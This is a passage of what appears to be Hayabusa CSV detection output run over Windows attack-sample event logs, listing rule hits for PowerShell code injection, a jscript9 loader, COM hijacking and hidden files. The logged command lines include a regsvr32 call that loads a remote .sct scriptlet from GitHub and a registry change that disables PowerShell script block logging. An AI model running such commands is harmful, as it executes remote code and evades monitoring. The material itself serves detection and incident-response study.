Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:18.833 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Defense Evasion - Unmanaged PowerShell Detected | Image: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e\System.Management.Automation.ni.dll | Process: C:\Windows\System32\notepad.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2840 | PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00 | Hash: SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:18.833 +09:00,IEWIN7,7,medium,Exec,In-memory PowerShell,,../hayabusa-rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Execution - jscript9 engine invoked via clsid | Cmd: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js | Process: C:\ProgramData\winpm.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13531 | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: 
SHA1=C537FF2520215555B6E7B1B71C237F73D960BBED,MD5=41B81EF73218EC0EA0EC74F1C4C0F7B1,SHA256=D1B611E6D672AFC5A3D0F443FD8E2618B7416EFE2DD36593E971BF2F027A9AE3,IMPHASH=BFA8DFA346E250F59C0E2F57DAEFD14D",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:50:36.889 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - rare script engine detected | Image: C:\Windows\System32\jscript9.dll | Process: C:\ProgramData\winpm.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=459A1C58B1B478B53734D0E053E8E14A12ACF427,MD5=FD5FFB00810EC3A9BE8D07EBE94CC034,SHA256=EEB182D598CE511C6509A0B94C17B04D9A4F451FCF99381E61B9DA9F224C510A,IMPHASH=E40AA27717F3033220E53410215609D0",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x13531 | PID: 2600 | PGUID: 365ABB72-4612-5CE0-0000-00103D1E2600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 
Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories | Cmd: attrib +h nbtscan.exe | Process: C:\Windows\System32\attrib.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x566cc | PID: 2728 | PGUID: DFAE8213-9310-5CE1-0000-0010EABA0A00 | Hash: SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Evas,Hiding Files with Attrib.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-20 03:05:07.719 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | SetValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 1348 | PGUID: 365ABB72-9AD3-5CE1-0000-0010F55C1800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx +2019-05-20 03:05:33.454 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | DeleteValue: 
HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging | Process: C:\Windows\system32\reg.exe | PID: 860 | PGUID: 365ABB72-9AEB-5CE1-0000-0010F0B51800,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | Process: C:\Users\IEUser\Downloads\com-hijack.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xc796 | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.463 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\demo.dll | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.463 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: 